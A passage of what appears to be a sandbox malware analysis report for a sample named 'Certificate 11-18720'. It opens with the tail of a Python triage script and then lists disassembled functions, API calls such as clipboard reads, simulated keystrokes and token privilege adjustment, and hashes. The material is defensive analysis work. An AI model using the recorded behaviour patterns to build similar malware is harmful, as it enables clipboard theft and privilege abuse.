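    for f in triage(SAMPLE):
        print(f"offset {f['offset']}: {'; '.join(f['hits'])}")
```

Run it against a report's function listing saved as text (replace SAMPLE with the file contents); the unbacked-memory check is the cheapest filter, since library code like the CRT and AutoIt runtime blocks on this page is always mapped from the image, while the unpacked payload is not.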
APIs
• PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 005CE959
Memory Dump Source
• Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
• Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
Similarity
• API ID: MessagePeek
• String ID:
• API String ID: 2222842502-0
APIs
• __flush.LIBCMT ref: 005E2A0B
  • Part of subcall function 005E7C0E: __getptd_noexit.LIBCMT ref: 005E7C0E
Similarity
• API ID: __flush__getptd_noexit
• String ID:
• API String ID: 4101623367-0
APIs
Similarity
• API ID: ProtectVirtual
• String ID:
• API String ID: 544645111-0
APIs
Similarity
• API ID: _free
• String ID:
• API String ID: 269201875-0
APIs
Similarity
• API ID: ClearVariant
• String ID:
• API String ID: 1473721057-0
APIs
  • Part of subcall function 005C4214: FreeLibrary.KERNEL32(00000000,?), ref: 005C4247
• LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,005C39FE,?,00000001), ref: 005C41DB
  • Part of subcall function 005C4291: FreeLibrary.KERNEL32(00000000), ref: 005C42C4
Similarity
• API ID: Library$Free$Load
• String ID:
• API String ID: 2391024519-0
APIs
Similarity
• API ID: ClearVariant
• String ID:
• API String ID: 1473721057-0
APIs
• ___lock_fhandle.LIBCMT ref: 005EAFC0
  • Part of subcall function 005E7BDA: __getptd_noexit.LIBCMT ref: 005E7BDA
  • Part of subcall function 005E7C0E: __getptd_noexit.LIBCMT ref: 005E7C0E
Similarity
• API ID: __getptd_noexit$___lock_fhandle
• String ID:
• API String ID: 1144279405-0
Similarity
• API ID: LibraryLoad
• String ID:
• API String ID: 1029625771-0
APIs
• __lock_file.LIBCMT ref: 005E2AED
  • Part of subcall function 005E7C0E: __getptd_noexit.LIBCMT ref: 005E7C0E
Similarity
• API ID: __getptd_noexit__lock_file
• String ID:
• API String ID: 2597487223-0
APIs
• FreeLibrary.KERNEL32(?,?,?,?,?,005C39FE,?,00000001), ref: 005C4286
Similarity
• API ID: FreeLibrary
• String ID:
• API String ID: 3664257935-0
APIs
• GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 005C40C6
                                                                                    Similarity
                                                                                    • API ID: LongNamePath
                                                                                    • String ID:
                                                                                    • API String ID: 82841172-0
                                                                                    • Opcode ID: acd9a433b02db2e49d96bef09798c00ad9fb1b173c98581f2eaa04e764dad174
                                                                                    • Instruction ID: 8b7567adac727d69c4795b02d92d646d739124e0033db34eb1a9eb49dff4f05f
                                                                                    • Opcode Fuzzy Hash: acd9a433b02db2e49d96bef09798c00ad9fb1b173c98581f2eaa04e764dad174
                                                                                    • Instruction Fuzzy Hash: EDE0CD37A001255BC7119654CC46FEA779DEFC8690F050075F905D7244DD74D9818690
                                                                                    APIs
                                                                                    • Sleep.KERNELBASE(000001F4), ref: 00F46299
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703940394.0000000000F43000.00000040.00000020.00020000.00000000.sdmp, Offset: 00F43000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_f43000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: Sleep
                                                                                    • String ID:
                                                                                    • API String ID: 3472027048-0
                                                                                    • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                    • Instruction ID: bb702b62d8855687d6a5f0ac98ed8e3922fe3adb46f053ca83f5f439d409ea4c
                                                                                    • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                    • Instruction Fuzzy Hash: BDE0E67494020DEFDB00DFB4D54969D7FB4EF04701F100161FD01D2280D6709E509A62
                                                                                    APIs
                                                                                      • Part of subcall function 005DB34E: GetWindowLongW.USER32(?,000000EB), ref: 005DB35F
                                                                                    • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?,?), ref: 0062F87D
                                                                                    • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0062F8DC
                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 0062F919
                                                                                    • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0062F940
                                                                                    • SendMessageW.USER32 ref: 0062F966
                                                                                    • _wcsncpy.LIBCMT ref: 0062F9D2
                                                                                    • GetKeyState.USER32(00000011), ref: 0062F9F3
                                                                                    • GetKeyState.USER32(00000009), ref: 0062FA00
                                                                                    • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0062FA16
                                                                                    • GetKeyState.USER32(00000010), ref: 0062FA20
                                                                                    • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0062FA4F
                                                                                    • SendMessageW.USER32 ref: 0062FA72
                                                                                    • SendMessageW.USER32(?,00001030,?,0062E059), ref: 0062FB6F
                                                                                    • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?,?), ref: 0062FB85
                                                                                    • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 0062FB96
                                                                                    • SetCapture.USER32(?), ref: 0062FB9F
                                                                                    • ClientToScreen.USER32(?,?), ref: 0062FC03
                                                                                    • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 0062FC0F
                                                                                    • InvalidateRect.USER32(?,00000000,00000001,?,?,?,?), ref: 0062FC29
                                                                                    • ReleaseCapture.USER32 ref: 0062FC34
                                                                                    • GetCursorPos.USER32(?), ref: 0062FC69
                                                                                    • ScreenToClient.USER32(?,?), ref: 0062FC76
                                                                                    • SendMessageW.USER32(?,00001012,00000000,?), ref: 0062FCD8
                                                                                    • SendMessageW.USER32 ref: 0062FD02
                                                                                    • SendMessageW.USER32(?,00001111,00000000,?), ref: 0062FD41
                                                                                    • SendMessageW.USER32 ref: 0062FD6C
                                                                                    • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0062FD84
                                                                                    • SendMessageW.USER32(?,0000110B,00000009,?), ref: 0062FD8F
                                                                                    • GetCursorPos.USER32(?), ref: 0062FDB0
                                                                                    • ScreenToClient.USER32(?,?), ref: 0062FDBD
                                                                                    • GetParent.USER32(?), ref: 0062FDD9
                                                                                    • SendMessageW.USER32(?,00001012,00000000,?), ref: 0062FE3F
                                                                                    • SendMessageW.USER32 ref: 0062FE6F
                                                                                    • ClientToScreen.USER32(?,?), ref: 0062FEC5
                                                                                    • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 0062FEF1
                                                                                    • SendMessageW.USER32(?,00001111,00000000,?), ref: 0062FF19
                                                                                    • SendMessageW.USER32 ref: 0062FF3C
                                                                                    • ClientToScreen.USER32(?,?), ref: 0062FF86
                                                                                    • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 0062FFB6
                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 0063004B
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend$ClientScreen$Image$CursorDragList_LongStateWindow$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                                                    • String ID: @GUI_DRAGID$F
                                                                                    • API String ID: 2516578528-4164748364
                                                                                    • Opcode ID: 257a817ab22dc6beb57762cd8652a82bd08633bae49397b6c39c748771cab3c8
                                                                                    • Instruction ID: 3ea1cf2f4fe9e7bae126c56ca087501b2e01e09a426901ef1fb98d14f088e834
                                                                                    • Opcode Fuzzy Hash: 257a817ab22dc6beb57762cd8652a82bd08633bae49397b6c39c748771cab3c8
                                                                                    • Instruction Fuzzy Hash: BC32CC78A04655EFDB10CF68D884BAABBBABF49344F140A39F5958B2A0D731DC41CF51
                                                                                    APIs
                                                                                    • SendMessageW.USER32(?,00000400,00000000,00000000), ref: 0062B1CD
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend
                                                                                    • String ID: %d/%02d/%02d
                                                                                    • API String ID: 3850602802-328681919
                                                                                    • Opcode ID: b1588ef53382b7a13459d70df7d9682499967dca3c06e1d80e9ad4d516c2755a
                                                                                    • Instruction ID: 75c65c4cf2d460c1b4546ec7fd4f8842a3a56297942b5849c165dc5c9f4d96bb
                                                                                    • Opcode Fuzzy Hash: b1588ef53382b7a13459d70df7d9682499967dca3c06e1d80e9ad4d516c2755a
                                                                                    • Instruction Fuzzy Hash: 8D12E171600629ABEB249FA4EC49FAE7BBAFF85710F104119F915DB2D1DBB08942CF11
                                                                                    APIs
                                                                                    • GetForegroundWindow.USER32(00000000,00000000), ref: 005DEB4A
                                                                                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00633AEA
                                                                                    • IsIconic.USER32(000000FF), ref: 00633AF3
                                                                                    • ShowWindow.USER32(000000FF,00000009), ref: 00633B00
                                                                                    • SetForegroundWindow.USER32(000000FF), ref: 00633B0A
                                                                                    • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00633B20
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 00633B27
                                                                                    • GetWindowThreadProcessId.USER32(000000FF,00000000), ref: 00633B33
                                                                                    • AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 00633B44
                                                                                    • AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 00633B4C
                                                                                    • AttachThreadInput.USER32(00000000,?,00000001), ref: 00633B54
                                                                                    • SetForegroundWindow.USER32(000000FF), ref: 00633B57
                                                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 00633B6C
                                                                                    • keybd_event.USER32(00000012,00000000), ref: 00633B77
                                                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 00633B81
                                                                                    • keybd_event.USER32(00000012,00000000), ref: 00633B86
                                                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 00633B8F
                                                                                    • keybd_event.USER32(00000012,00000000), ref: 00633B94
                                                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 00633B9E
                                                                                    • keybd_event.USER32(00000012,00000000), ref: 00633BA3
                                                                                    • SetForegroundWindow.USER32(000000FF), ref: 00633BA6
                                                                                    • AttachThreadInput.USER32(000000FF,?,00000000), ref: 00633BCD
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                                    • String ID: Shell_TrayWnd
                                                                                    • API String ID: 4125248594-2988720461
                                                                                    • Opcode ID: 084e9caa18ad2573f265bdd856aa6eab86736c087c341ff176d34624af739966
                                                                                    • Instruction ID: 9ffda9b48e0d6f50bb5a76a22655dc01b305a59f5dfdddafce60bb494b4bf0ad
                                                                                    • Opcode Fuzzy Hash: 084e9caa18ad2573f265bdd856aa6eab86736c087c341ff176d34624af739966
                                                                                    • Instruction Fuzzy Hash: 9031C775F40328BBEB202B659C49FBF7E6EEB45B50F114015FA05EA2D0DAB05D00ABA0
                                                                                    APIs
                                                                                      • Part of subcall function 005FB134: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 005FB180
                                                                                      • Part of subcall function 005FB134: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 005FB1AD
                                                                                      • Part of subcall function 005FB134: GetLastError.KERNEL32 ref: 005FB1BA
                                                                                    • _memset.LIBCMT ref: 005FAD08
                                                                                    • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 005FAD5A
                                                                                    • CloseHandle.KERNEL32(?), ref: 005FAD6B
                                                                                    • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 005FAD82
                                                                                    • GetProcessWindowStation.USER32 ref: 005FAD9B
                                                                                    • SetProcessWindowStation.USER32(00000000), ref: 005FADA5
                                                                                    • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 005FADBF
                                                                                      • Part of subcall function 005FAB84: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,005FACC0), ref: 005FAB99
                                                                                      • Part of subcall function 005FAB84: CloseHandle.KERNEL32(?,?,005FACC0), ref: 005FABAB
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                                                                    • String ID: $H*g$default$winsta0
                                                                                    • API String ID: 2063423040-11867929
                                                                                    • Opcode ID: 0897868406290253de619bae033c79897066c2a048b1dcd198b137872322f763
                                                                                    • Instruction ID: d20de987c6bf81767ba9bcb0937a4708e684adcee7c9507680dfeed79e3255fb
                                                                                    • Opcode Fuzzy Hash: 0897868406290253de619bae033c79897066c2a048b1dcd198b137872322f763
                                                                                    • Instruction Fuzzy Hash: 068156B580020DAFDF119FA4CC49ABEBFB9FF09304F044119FA18A6161D7398E549B62
                                                                                    APIs
                                                                                      • Part of subcall function 00606EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00605FA6,?), ref: 00606ED8
                                                                                      • Part of subcall function 00606EBB: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00605FA6,?), ref: 00606EF1
                                                                                      • Part of subcall function 0060725E: __wsplitpath.LIBCMT ref: 0060727B
                                                                                      • Part of subcall function 0060725E: __wsplitpath.LIBCMT ref: 0060728E
                                                                                      • Part of subcall function 006072CB: GetFileAttributesW.KERNEL32(?,00606019), ref: 006072CC
                                                                                    • _wcscat.LIBCMT ref: 00606149
                                                                                    • _wcscat.LIBCMT ref: 00606167
                                                                                    • __wsplitpath.LIBCMT ref: 0060618E
                                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 006061A4
                                                                                    • _wcscpy.LIBCMT ref: 00606209
                                                                                    • _wcscat.LIBCMT ref: 0060621C
                                                                                    • _wcscat.LIBCMT ref: 0060622F
                                                                                    • lstrcmpiW.KERNEL32(?,?), ref: 0060625D
                                                                                    • DeleteFileW.KERNEL32(?), ref: 0060626E
                                                                                    • MoveFileW.KERNEL32(?,?), ref: 00606289
                                                                                    • MoveFileW.KERNEL32(?,?), ref: 00606298
                                                                                    • CopyFileW.KERNEL32(?,?,00000000), ref: 006062AD
                                                                                    • DeleteFileW.KERNEL32(?), ref: 006062BE
                                                                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 006062E1
                                                                                    • FindClose.KERNEL32(00000000), ref: 006062FD
                                                                                    • FindClose.KERNEL32(00000000), ref: 0060630B
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: File$Find_wcscat$__wsplitpath$CloseDeleteFullMoveNamePath$AttributesCopyFirstNext_wcscpylstrcmpi
                                                                                    • String ID: \*.*
                                                                                    • API String ID: 1917200108-1173974218
                                                                                    • Opcode ID: 04811758c509dec2b1ea82fbd018de9da50b253135b9c312d7b06af773bcf292
                                                                                    • Instruction ID: d35418a31cedbcb66eaefb1a1e6f8150076855ca331e37a953b7bfeead64c469
                                                                                    • Opcode Fuzzy Hash: 04811758c509dec2b1ea82fbd018de9da50b253135b9c312d7b06af773bcf292
                                                                                    • Instruction Fuzzy Hash: 68512072C4811C6ACB25EB91CC45DDBB7BDAF05300F0501EAF585E3181DE7697998FA4
APIs
• OpenClipboard.USER32(0065DC00), ref: 00616B36
• IsClipboardFormatAvailable.USER32(0000000D), ref: 00616B44
• GetClipboardData.USER32(0000000D), ref: 00616B4C
• CloseClipboard.USER32 ref: 00616B58
• GlobalLock.KERNEL32(00000000), ref: 00616B74
• CloseClipboard.USER32 ref: 00616B7E
• GlobalUnlock.KERNEL32(00000000), ref: 00616B93
• IsClipboardFormatAvailable.USER32(00000001), ref: 00616BA0
• GetClipboardData.USER32(00000001), ref: 00616BA8
• GlobalLock.KERNEL32(00000000), ref: 00616BB5
• GlobalUnlock.KERNEL32(00000000), ref: 00616BE9
• CloseClipboard.USER32 ref: 00616CF6
Memory Dump Source
• Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
• Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
Similarity
• API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
• String ID:
• API String ID: 3222323430-0
• Opcode ID: 8c4efa3dcc2d99929a4bac498c975f7f36536034517eb1259ef042efcd652a9e
• Instruction ID: 227c0b2da59f28da9c1361b116a499cb3f5527410dcc359c6100ec36dabf818b
• Opcode Fuzzy Hash: 8c4efa3dcc2d99929a4bac498c975f7f36536034517eb1259ef042efcd652a9e
• Instruction Fuzzy Hash: CC5191792042026FD300AFA4DD4AFAE7BAAAF85B00F05052DF696D62D1DF70D9458B62
APIs
• FindFirstFileW.KERNEL32(?,?), ref: 0060F62B
• FindClose.KERNEL32(00000000), ref: 0060F67F
• FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0060F6A4
• FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0060F6BB
• FileTimeToSystemTime.KERNEL32(?,?), ref: 0060F6E2
• __swprintf.LIBCMT ref: 0060F72E
• __swprintf.LIBCMT ref: 0060F767
• __swprintf.LIBCMT ref: 0060F7BB
  • Part of subcall function 005E172B: __woutput_l.LIBCMT ref: 005E1784
• __swprintf.LIBCMT ref: 0060F809
• __swprintf.LIBCMT ref: 0060F858
• __swprintf.LIBCMT ref: 0060F8A7
• __swprintf.LIBCMT ref: 0060F8F6
Strings
Memory Dump Source
• Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
• Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
Similarity
• API ID: __swprintf$FileTime$FindLocal$CloseFirstSystem__woutput_l
• String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
• API String ID: 835046349-2428617273
• Opcode ID: ffb682b6ac2579e6802cb286a64374d131e60f8d3fa0f2e3305f7ec90e08871e
• Instruction ID: 437e6f5f4c771765ea2abe7097e6bfe97df3429dc7c340b96a122596079a5a30
• Opcode Fuzzy Hash: ffb682b6ac2579e6802cb286a64374d131e60f8d3fa0f2e3305f7ec90e08871e
• Instruction Fuzzy Hash: 94A100B2404345ABC314EB95C889EAFBBEDFF94704F44092EF58587291EB34D949CB62
APIs
• FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 00611B50
• _wcscmp.LIBCMT ref: 00611B65
• _wcscmp.LIBCMT ref: 00611B7C
• GetFileAttributesW.KERNEL32(?), ref: 00611B8E
• SetFileAttributesW.KERNEL32(?,?), ref: 00611BA8
• FindNextFileW.KERNEL32(00000000,?), ref: 00611BC0
• FindClose.KERNEL32(00000000), ref: 00611BCB
• FindFirstFileW.KERNEL32(*.*,?), ref: 00611BE7
• _wcscmp.LIBCMT ref: 00611C0E
• _wcscmp.LIBCMT ref: 00611C25
• SetCurrentDirectoryW.KERNEL32(?), ref: 00611C37
• SetCurrentDirectoryW.KERNEL32(006739FC), ref: 00611C55
• FindNextFileW.KERNEL32(00000000,00000010), ref: 00611C5F
• FindClose.KERNEL32(00000000), ref: 00611C6C
• FindClose.KERNEL32(00000000), ref: 00611C7C
Strings
Memory Dump Source
• Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
• Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
Similarity
• API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
• String ID: *.*
• API String ID: 1803514871-438819550
• Opcode ID: b3bf4563fcd6e7b191f46e0576587641a9d33f541b81428255fb55899735a76b
• Instruction ID: 4f2f224c6ae21e2bf7a4d2b68a9b01f81876ed0ea01f49df2597aef0bd460b7d
• Opcode Fuzzy Hash: b3bf4563fcd6e7b191f46e0576587641a9d33f541b81428255fb55899735a76b
• Instruction Fuzzy Hash: 22310835A0061A6FDF20DFB0DC48ADE77AEAF47310F044156FA05D7190EB74DA858E64
APIs
• FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 00611CAB
• _wcscmp.LIBCMT ref: 00611CC0
• _wcscmp.LIBCMT ref: 00611CD7
  • Part of subcall function 00606BD4: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00606BEF
• FindNextFileW.KERNEL32(00000000,?), ref: 00611D06
• FindClose.KERNEL32(00000000), ref: 00611D11
• FindFirstFileW.KERNEL32(*.*,?), ref: 00611D2D
• _wcscmp.LIBCMT ref: 00611D54
• _wcscmp.LIBCMT ref: 00611D6B
• SetCurrentDirectoryW.KERNEL32(?), ref: 00611D7D
• SetCurrentDirectoryW.KERNEL32(006739FC), ref: 00611D9B
• FindNextFileW.KERNEL32(00000000,00000010), ref: 00611DA5
• FindClose.KERNEL32(00000000), ref: 00611DB2
• FindClose.KERNEL32(00000000), ref: 00611DC2
Strings
Memory Dump Source
• Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
• Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
Similarity
• API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
• String ID: *.*
• API String ID: 1824444939-438819550
• Opcode ID: 342ad13868a972ff7d4ae87f0eaed5e9e6478280b12f91672bc0091ac9cc83f7
• Instruction ID: 6f4d6cb0a9c4011572dabf355dfc02db8fd3c530cbdf278a89376c2fe5a27ab3
• Opcode Fuzzy Hash: 342ad13868a972ff7d4ae87f0eaed5e9e6478280b12f91672bc0091ac9cc83f7
• Instruction Fuzzy Hash: 6631083190061A6BCF24EFA0EC09ADE77AF9F47324F184555FA11A72D0DB70DA858E58
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
• Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
Similarity
• API ID: _memset
• String ID: Q\E$[$[:<:]]$[:>:]]$\$\$\$\b(?<=\w)$\b(?=\w)$]$^
• API String ID: 2102423945-2023335898
• Opcode ID: 98412a4a4bb24fbf92b93369e61531b0601fb2378659924a85addd1726b2bcdc
• Instruction ID: e38aecbe08459bec32f8159fadc4b757fdeeb5f65c7dc0b83e3fe0832f05e6d4
• Opcode Fuzzy Hash: 98412a4a4bb24fbf92b93369e61531b0601fb2378659924a85addd1726b2bcdc
